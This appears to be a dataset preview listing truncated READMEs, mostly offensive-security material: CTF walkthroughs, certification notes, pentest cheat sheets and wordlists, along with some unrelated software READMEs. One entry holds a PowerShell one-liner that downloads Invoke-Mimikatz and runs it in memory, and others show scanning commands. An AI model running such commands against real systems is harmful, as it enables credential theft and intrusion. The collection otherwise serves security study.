text stringlengths 9 334k |
|---|
# NerdHerd
Hack your way into this easy/medium level legendary TV series "Chuck" themed box!
[NerdHerd](https://tryhackme.com/room/nerdherd)
## Topic's
- Network Enumeration
- Linux Enumeration
- FTP Enumeration
- SMB Enumeration
- Steganography
- Cryptography
- Base64
- Vigenère
- CVE-2017-16995 - Linux Kernel... |
# Bratarina
## Table of Contents
* [Summary](#summary)
* [Enumerate](#enumerate)
* [Ports](#ports)
* [Services](#services)
* [SSH](#ssh)
* [SMTP](#smtp)
* [HTTP](#http)
* [SMB](#smb)
* [OS](#os)
* [Nmap OS Discovery Scan](#nmap-os-discovery-scan)
* [Nmap OS Discovery Scan via SMB](#nmap-o... |
### Proving Grounds Writeups
- AD:Heist, Hutch, Vault, Resourced
- BOF:Malbec
- WordPress:SunsetMidnight
- SQLi:Butch
- LibreOffice:Hepet, Craft
- SeImpersonatePrivilege:Craft
- container:Sirol
#### Exploits
- [WordPress Core < 5.2.3](https://www.exploit-db.com/exploits/47690)
- [XAMPP 7.4.3 - Local Privilege Escala... |
# Awesome-PenTest-Practice
### Tips, Materials and commands that you can use in CTFs, RealPenTest and even Bug Bounty!
#### My LinkedIn: https://www.linkedin.com/in/joas-antonio-dos-santos/ >> Contains more than 170 articles by Red and Blue Team
-------------------------------------------------------------------------... |
# eJPT Notes - eLearnSecurity Junior Penetration Tester Certificate Notes

### NOTE
- **I am not - affiliated with eLearnSecurity in any way and these notes do not guarantee that you pass.**
- Replace 10.10.10.2 with the proper IP based on your situation
## What is this?
- The notes be... |
<h1 align="center">mksub <a href="https://twitter.com/intent/tweet?text=mksub%20-%20Generate%20tens%20of%20thousands%20of%20subdomain%20combinations%20in%20a%20matter%20of%20seconds%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fmksub&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--ligh... |
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLAN... |
.:: 0xR ::.
.:: Reverse Shell Cheat Sheet Tool ::.
.:: cyber-warrior.org ::.
#Install Note
Clone the repository:
git clone https://github.com/0xR0/shellver.git
Then... |
# Awesome Bug Bounty [](https://github.com/sindresorhus/awesome)
A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters.
## Table of Contents
- [Getting Started](#getti... |
# Pentest Environment Deployer | [](https://travis-ci.org/Sliim/pentest-env)
This repo provides an easy way to deploy a clean and customized pentesting environment with Kali linux using vagrant and virtualbox.
## Requirements
I assume you are ... |
# Dictionary-Of-Pentesting
## 简介
收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。
收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。
涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。
该项目计划持续收集,也欢迎感兴趣的大佬一起来完善。可直接提交PR,也可以提建议到issue。
## 更新记录
**2020.11.23**
1. 增加ctf字典。
2. 增加摄像rtsp默认路径和默认用户名和密码
**2020.11.1... |
# awesome-web-hacking
This list is for anyone wishing to learn about web application security but do not have a starting point.
You can help by sending Pull Requests to add more information.
If you're not inclined to make PRs you can tweet me at `@infoslack`
Table of Contents
=================
* [Books](#books)
... |
# All-in-one_BugBounty_PDF_bundles
### All-in-one_PDF
[](https://twitter.com/1ndianl33t)
[ All-in-one-Recon-by_@1ndianl33t ](https://drive.google.com/file/d/1uBTra6_jwhLnZALJVp9hmHaty2pBBUH2/view?usp=drivesdk)
[](https://awesome.re)
> A curated list of awesome resources about embedded and IoT security. The list contains software and hardwar... |
<h1 align="center">
<br>
<a href=""><img src="https://user-images.githubusercontent.com/13212227/104400983-a5cc0a00-5596-11eb-8aeb-81c747f26663.png" width="500px"></a>
<br>
<img src="https://img.shields.io/github/languages/top/hahwul/MobileHackersWeapons?style=flat">
<img src="https://img.shields.io/github/l... |
# Odin #1 - CTF
Available on VulnHub: https://www.vulnhub.com/entry/odin-1,619/
## IP Discovery
```
$ sudo netdiscover -r 192.168.1.0/16
```
```
Currently scanning: Finished! | Screen View: Unique Hosts
0 Captured ARP Req/Rep packets, from 0 hosts. Total size: 0
____________________________________________... |
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.2"><img src="https://img.shields.io/badge/Version-1.1.2-brightgreen.svg?style=style=flat-square" alt="version"></a>
<a href="https://github.com/Tuhinshubhra/CMSeeK/"... |
# Advanced Web Attacks & Exploitation
All efforts for the AWAE course and preparation for the Offensive Security Web Expert (OSWE) exam.
## Study Strategy
* Several rounds of course content
* First round:
* Watch videos
* Read text and take good notes
* Complete the main exercises
* Second round:
* Wat... |
# Awesome Threat Detection and Hunting
[](https://github.com/sindresorhus/awesome)
> A curated list of awesome threat detection and hunting resources
## Contents
- Threat Detection and Hunting
- 🔨 [Too... |
# iOS Penetration Testing Cheat Sheet
This is more of a checklist for myself. May contain useful tips and tricks.
Everything was tested on Kali Linux v2023.1 (64-bit) and iPhone 7 with iOS v13.4.1 and unc0ver jailbreak v8.0.2.
Check [3uTools](https://www.3u.com) if you want to jailbreak your iOS device. I have no [l... |
### Resources For BugBounty Hunters
Forums
1. BugBountyForum
2. BugBountyWorld
Practise :
1. https://www.hacksplaining.com/lessons
2. https://www.amanhardikar.com/mindmaps/Practice.html
3. http://www.pentesterlabs.com/
4. https://attackdefense.com/
5. https://www.hackthebox.eu/
6. https://picoctf.com/
7. htt... |
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<img src="https://img.shields.io/badge/Version-1.0.2%20Beta-brightgreen.svg?style=style=flat-square" alt="version">
<img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version">
<img sr... |
# PenTest CheatSheets
This is a repo for pentest cheat sheets which I have found useful!!
1. https://pentestbook.six2dez.com/others/web-checklist is pentest `#Checklist`.
2. https://github.com/trimstray/the-book-of-secret-knowledge#hackingpenetration-testing-toc is a complete cheatsheet. `#CheatSheet`
3. https://... |
# eJPT
some eLearnSecurity eJPT exam preparation materials
### nmap + fping
hosts discovery fping:
```bash
fping -a -g 10.10.10.0/24 2> fping.txt
```
hosts discovery nmap:
```bash
nmap -sn 10.10.10.0/24 > hosts.txt
nmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}'
```
open ports scan (save to file):
```bash
n... |
### IP
`10.10.137.94`
# Enumeration
### nmap
`nmap -sC -sV 10.10.137.94 -oN init.nmap`
```
Nmap scan report for 10.10.137.94
Host is up (0.12s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp filtered http
```
Only port 80 is open.
I also ran a full port-scan here, but nothing else show... |
# macOS Red Teaming
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>�... |
# Hack The Box
[Hack The Box](https://www.hackthebox.eu) is an online platform allowing you to test and advance your skills in cyber security.
**Reversing 4/10**
| Title | Points | Status | WriteUp |
| :---: | :---: | :---: | :---: |
| Crack This! | 80 | :disappointed_relieved: | |
| The Art of Reversing | 40 | :disa... |
## A Repository of resources to learn Cyber Security Topics From:
I will try to break the resources in Major Categories and then break them down into more niche topics when needed :). Please feel free to make a pull request with a resource you wanna add or if you wanna make some Contributions as well. Also this libra... |
## <span id="head1"> Penetration_Testing_POC</span>
搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。
- [ Penetration_Testing_POC](#head1)
- [ 请善用搜索[`Ctrl+F`]查找](#head2)
- [IOT Device&Mobile Phone](#head3)
- [Web APP](#head4)
- [ 提权辅助相关](#head5)
- [ PC](#head6)
- [ tools-小工具集合](#head7)
- [ 文章/书籍/教程相关](#head8)
- [ 说明](#head9)... |
# One-Liners [](https://awesome.re)
###### Thanks to all who create these Awesome One Liners❤️
----------------------

---------------------------
# Subdomain Enu... |
<h1 align="center">
<br>
<a href="https://github.com/HACKE-RC/webdork"><img src="https://beeimg.com/images/f36886119494.png" alt="webdork" width="600" height="300"></a>
<br>
ReporterX v1.0 beta
<br>
</h1>
<p align="center">Report writing made easy.</p>
# ReporterX
Python tool to automate report writing with... |
<p align="center"><img src="src/banner.png" alt="Banner"></img></p>
<p align="center">Creator: <a href="https://app.hackthebox.eu/profile/1190">egre55</a></p>
# Personal thoughts
Easy peasy lemon squeezy; just need to do a little bit of enumeration, even you don't need any special tenhniques for this box. I tried to e... |
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos)
# Injection
- PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、Dylib注入,当前包括400+工具和350+文章,根据功能进行了粗糙的分类
- [English Version](https://github.com/alphaSeclab/injection-stuff/blob/master/Readme_en.md)
# 目录
- [PE注入](#81a3947baa3f99adaf73a8f9766e48fa) -> [... |

[](https://badge.fury.io/rb/wpscan)
[](https://travis-ci.or... |
## Information Gathering
* [whois](https://www.tecmint.com/whois-command-get-domain-and-ip-address-information/) [](https://www.youtube.com/watch?v=mOrWk-80ObA)
```
whois goo... |
# Microsoft Authentication Library (MSAL) for Python
| `dev` branch | Reference Docs | # of Downloads per different platforms | # of Downloads per recent MSAL versions |
|---------------|---------------|----------------------------------------|-----------------------------------------|
[
- [Exploit](#exploit)
- [Google Maps](#google-maps)
- [Algolia](#algolia)
- [AWS Access K... |
---
title: 'WPScan'
category: 'scanner'
type: "CMS"
state: "released"
appVersion: "v3.8.19"
usecase: "Wordpress Vulnerability Scanner"
---

<!--
SPDX-FileCopyrightText: 2021 iteratec GmbH
SPDX-License-Identifier: Apach... |

[](https://gitter.im/BBRteam/Lobby "Gitter Chat")
# Bug Bounty Resources
Storehouse of resources related to Bug Bounty Hunting collected from different s... |
# Hacking-Resources
---
This repository contains some resources for ethical hackers penetration tester 😊 This may contain some files, tools, books, and links that need to be used for good purposes only. Do not do any illegal work using these sources.
This is only for keeping some resources and topics in one-place ... |
### TensorFlow Makefile
The recommended way to build TensorFlow from source is using the Bazel
open-source build system. Sometimes this isn't possible. For example,
if you are building for iOS, you currently need to use the Makefile.
- The build system may not have the RAM or processing power to support Bazel.
- Ba... |
## Arthas

[](https://travis-ci.org/alibaba/arthas)
[](https://codecov.io/gh/alibaba/arthas)
](https://github.com/sindresorhus/awesome)
A curated list of awesome malware analysis tools and resources. Inspired by
[awesome-python](https://github.com/vinta/awesome-python) an... |
<p align="center">
<img src="https://user-images.githubusercontent.com/63926014/209046028-a851de73-fcf5-4cf3-a7bd-297148f5d986.png">
Hey, I'm E.T. I'm a cybersecurity consultant with experience & interests in security compliance, cloud security, and penetration testing. <br>
<img src="https://user-images.githubuserco... |
# Jeff
Can you hack Jeff's web server?
- [Jeff](https://tryhackme.com/room/jeff)
## Appendix archive
Password: `1 kn0w 1 5h0uldn'7!`
## Task 1 Get Root
This machine may take upto 5 minutes to fully deploy.
Get user.txt and root.txt.
This is my first ever box, I hope you enjoy it. If you find yourself brute forc... |
<p align="center">
<a href="https://wpscan.org/">
<img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo">
</a>
</p>
<h3 align="center">WPScan</h3>
<p align="center">
WordPress Vulnerability Scanner
<br>
<br>
<a href="https://wpscan.org/" title=... |
# oswe_preparation
## Curated List
The following Links are curated from Below Sources.
| Name | URL |
| ------ | ------ |
| M507 | [Github](https://github.com/M507/AWAE-Preparation/) |
| Z-r0crypt OSWE/AWAE Preparation | [Blog](https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/) |
| AWAE - OSWE ... |
# Airbnb React/JSX Style Guide
*A mostly reasonable approach to React and JSX*
This style guide is mostly based on the standards that are currently prevalent in JavaScript, although some conventions (i.e async/await or static class fields) may still be included or prohibited on a case-by-case basis. Currently, anythi... |
# OSWE-Prep
An OSWE Guide
#### WriteUps
<https://stacktrac3.co/oswe-review-awae-course/>
<https://github.com/wetw0rk/AWAE-PREP]>
<https://github.com/timip/OSWE>
<https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside>
<https://anchor.fm/dayzerosec/episodes/Offensive-Securitys-OSWEAWA... |
## Arthas

[](https://travis-ci.org/alibaba/arthas)
[](https://codecov.io/gh/alibaba/arthas)
[](https://travis-ci.org/lukaspustina/wpscan-analyze) [. The
[OpenJS Foundation][] provides support for the project.
Contributors are expected to act in a c... |
# Web Enum Quick Reference
## Contents
- [Web Enum Quick Reference](#web-enum-quick-reference)
* [Contents](#contents)
* [HTTP and HTTPS Checklist](#http-and-https-checklist)
* [Scan for sub directories and pages](#scan-for-sub-directories-and-pages)
+ [Wordlists](#wordlists)
+ [Scanning Tools](#scanni... |
# security-scripts
A collection of security related Python and Bash shell scripts, mainly revolving
around testing hosts for security vulnerabilities. For the shell scripts no
fancy programming framework is required, all that is needed is a Bash shell.
Note that it is highly recommended to use `analyze_hosts.py` as i... |
# WiFi Penetration Testing Cheat Sheet
This is more of a checklist for myself. May contain useful tips and tricks.
Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple Mark VII Basic with the firmware v1.0.2.
Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple NANO with the fir... |
This repo is for the demos of JNDI injection series:
https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-1-31044f782daa
https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-dynamic-class-loading-from-remote-url-28dcbf9cee27
https://medium.com/bugbountywriteup/jndi-injection-series-rm... |
<p align="right">IT'S CURRENTLY A WIP - WORK IN PROGRESS</p>
# "Zero to Hero" "No Bull$h1t" em Segurança Cibernética
Cursos para fazer um "Zero to Hero" em Cyber Segurança **sem marketing**, vai ter que:
- estudar muito (estamos falando de um "Hero" né?)
- estudar coisas "não técnicas" e "não convencionais" (Qua... |
# Learn365
This repository contains all the information shared during my Learn 365 Challenge. Learn 365 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for the whole year, it can be anything from infosec to general life. Follow me on Twitter for Regular Updates: [Anubh... |
# 所有收集类项目:
- [收集的所有开源工具](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式
- [逆向资源](https://github.com/alphaSeclab/awesome-reverse-engineering): IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/Android安全/iOS安全/Window安全/Linux安全/macOS安全/游戏Hacking/Boot... |
# haise
## Internal Network Pentest Framework

## Internal Penetration Testing:
An Internal Penetration Test differs from a vulnerability assessment in that it actually exploits the vulnerabilities to determine what information is actually exposed. An ... |
Updated posted is at https://ishaqmohammed.me/posts/pwk-oscp-preparation-roadmap/
### My roadmap for preparing for [OSCP](https://www.offensive-security.com/pwk-oscp/), anyone is free to use this and also feedback and contributions are welcome
### **101s(Enumeration)**
**1. DNS 101 (Basics of DNS and DNS enumaera... |
| **Command** | **Description** |
| --------------|-------------------|
| `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell |
| `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell |
| `... |
# Easy Peasy
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
[Easy Peasy](https://tryhackme.com/room/easypeasyctf)
## Topic's
- Network Enumeration
- Web Enumeration
- Cryptography
... |
## Enumeration - Ports and its purposes.
https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html
## Banner grabbing to check on all ports
```
nc -nv <IP> <port Number>
-C for CLRF
```
```
telnet <IP> <PORT number>
```
#Nmap scan on all ports
```
nmap -sC -sV -p- -oA full 127.0.0.1
nmap -sU -p- ... |
# Track Awesome Cyber Security University Updates Daily
🎓 Because Education should be free. Contributions welcome! 🕵️
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/brootware/awesome-cyber-security-university/rss.xml) · [📮 Subscribe](http... |
---
title: "CMSeeK"
category: "scanner"
type: "CMS"
state: "released"
appVersion: "v.1.1.3"
usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities"
---
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
-----------... |
<h1 align="center">Resolvers <a href="https://twitter.com/intent/tweet?text=Trickest%20Resolvers%20-%20The%20most%20exhaustive%20list%20of%20reliable%20DNS%20resolvers%20%40trick3st%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fresolvers&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Twee... |
# OSWA Experience And Exam Preparation Guide
My Offensive Security OSWA certification experience and my personal opinion what helps in preparation for the exam. You think I missed something or have a question? Just reach out by creating an issue or sending me message on [Twitter](https://twitter.com/rnd_infosec_guy)
#... |
# networking
## The Code
- Try Harder
- Progress is not moving forward on the problem. It is learning more. If you are learning ways that don't work, you are progressing and don't qualify to ask/look for hints.
- Applications break on bad inputs, not on good ones. Developers forget to consider bad inputs or edge ... |
# Swagger Code Generator
[](https://travis-ci.org/swagger-api/swagger-codegen)
[](https:/... |
<h1 align="center">
<img src="static/httpx-logo.png" alt="httpx" width="200px">
<br>
</h1>
<p align="center">
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a>
<a href="https://goreportcard.com/badge/github.com/projectdiscovery/httpx"><img src="https:... |
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge">
<img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master">
</a>
</p>
<p align="center">"<i>Knowledge is powerful, be careful how you us... |
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
ReconFTW
<br>
</h1>
<h4 align="center">A simple bash script for full recon</h4>
<p align="center">
<a href="https://github.com/six2dez/... |
# Red Team Arsenal [](https://twitter.com/intent/tweet?text=Red%20Team%20Arsenal%20(RTA)%20-%20An%20intelligent%20scanner%20to%20detect%20security%20vulnerabilities%20in%20company%27s%20layer%207%20assets&url=https://github.com/flipkart-... |
# [Django REST framework][docs]
[![build-status-image]][travis]
[![coverage-status-image]][codecov]
[![pypi-version]][pypi]
[](https://gitter.im/tomchristie/django-rest-framework?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
**Awesome... |
# Develpy
boot2root machine for FIT and bsides Guatemala CTF
[Develpy](https://tryhackme.com/room/bsidesgtdevelpy)
## Topic's
* Network Enumeration
* Code Injection (RCE)
* Exploiting Crontab
## Task 1 Develpy
read user.txt and root.txt
```
kali@kali:~/CTFs/tryhackme/Develpy$ sudo nmap -A -sS -sC -sV -O -p- 10.1... |
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) ESP32-WROOM!
## This flasher/updater will work for any ESP32-WROOM chip or the v4 OEM Marauder.
Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFl... |
# Getting Started in Cybersecurity and Hacking
## Introduction
This guide aims to provide easy-to-access resources for individuals interested in learning more about Technology, Cybersecurity, Ethical hacking, and Bug Bounty. Below, you will find organized links and resources related to each topic for your convenience.
... |
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1>
Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the... |
<!-- MANPAGE: BEGIN EXCLUDED SECTION -->
<div align="center">
[](#readme)
[](#installation "Installation")
[... |
# SSTI

## What is SSTI ?
- Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
<a href="https://portswigger.net/web-security/server-side-template-injection">Portswigger Detailed explan... |
<p align="center">
<a href="https://wpscan.org/">
<img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo">
</a>
</p>
<h3 align="center">WPScan</h3>
<p align="center">
WordPress Vulnerability Scanner
<br>
<br>
<a href="https://wpscan.org/" title=... |
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge">
<img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master">
</a>
</p>
<p align="center">"<i>Knowledge is powerful, be careful how you us... |
[](https://travis-ci.org/ytdl-org/youtube-dl)
youtube-dl - download videos from youtube.com or other video platforms
- [INSTALLATION](#installation)
- [DESCRIPTION](#description)
- [OPTIONS](#options)
- [CONFIGURATION](#configuration)
- [OUTP... |
# Dictionary-Of-Pentesting
## 简介
收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。
收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。
涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。
该项目计划持续收集。
## 更新记录
**2021.06.06**
1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。
2. 200万子域名字... |
# CyberTruckChallenge22
Android security workshop taught at the CyberTruck Challenge 2022 (Michigan USA). Further info at https://www.cybertruckchallenge.org
## Description
A new mobile remote keyless system "CyberTruck" has been implemented by one of the most well-known car security companies "NowSecure Mobile Vehi... |
# Venom

#### Offensive Security Framework for Vulnerability Scanning & Pentesting

[](https://www.python.org/downloads/release/python-3614)
[**
A challenge that takes 10 hours to solve, takes 10 minutes to explain :)
# CTF
**[CTFTime](https://ctftime.org)**<br>
**[OverTheWire](https://overthewire.org/wargames)**<br>
**[... |
# A Red-Teamer diaries
<p align="center">
<img src="https://www.welivesecurity.com/wp-content/uploads/2014/05/rooftop-1024x576.png"/>
</p>
Publicly accessible notes about my pentesting/red teaming experiments tested on several controlled environments/infrastructures that involve playing with various tools and techn... |
# Hacking-Cheatsheet
In this repo I collect all commands, links, techniques and tricks I found during my work as pentester, hacker, OSCP student and hack the box fan.
# Basic Linux stuff you may need
Keyword search in man pages:
```bash
man -k <KEYWORD>
```
Alternatively:
```bash
apropos <KEYWORD>
```
## Find stuff
`... |
# attack_tool
### 1.dirmap web目录扫描工具
https://github.com/H4ckForJob/dirmap
dirmap的安装指南
```git clone https://github.com/H4ckForJob/dirmap.git &&
cd dirmap
python3 -m pip install -r requirement.txt
python3 dirmap.py -i http://192.168.31.200 -lcf
```
dirmap的使用方法
```
python3 dirmap.py -i https://target.com -lcf
pytho... |
# Stocker - HackTheBox - Writeup
Linux, 20 Base Points, Easy

## Machine

## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`.
***User***: Discovered the virtual host `dev.stocker.htb` and ... |
# File Inclusion
> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the ... |
# Retro
New high score!
[Retro](https://tryhackme.com/room/retro)
## Topic's
- Network Enumeration
- Web Enumeration
- Web Poking
- CVE-2017-0213 - Windows COM Aggregate Marshaler/IRemUnknown2
## Appendix archive
Password: `1 kn0w 1 5h0uldn'7!`
## Pwn
Can you time travel? If not, you might want to think about t... |
# Introduction to Hacking Library
The goal of this library is to create an archive of useful tools and how to use them, mostly for:
- Hacking
- Pentests
- Security
Remember, this is only a guide, use the knowledge here wisely and at your own risk.
Have fun!
# Analysis Websites
## IPOK
A colection of online tool... |
# Breadcrumbs - HackTheBox - Writeup
Windows, 40 Base Points, Hard
## Machine

## Breadcrumbs Solution
### User 1
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Breadcrumbs]
└──╼ $ nmap -sC -sV -oA nmap/Breadcrumbs 10.10.10.228
Startin... |
# BlueTeam-Tools
<p align="center">
<img src="https://user-images.githubusercontent.com/100603074/210680535-40d8c113-2336-4417-bdb4-4825a7477164.png" height="300">
</p>
This github repository contains a collection of **65+** **tools** and **resources** that can be useful for **blue teaming activities**.
Some of th... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.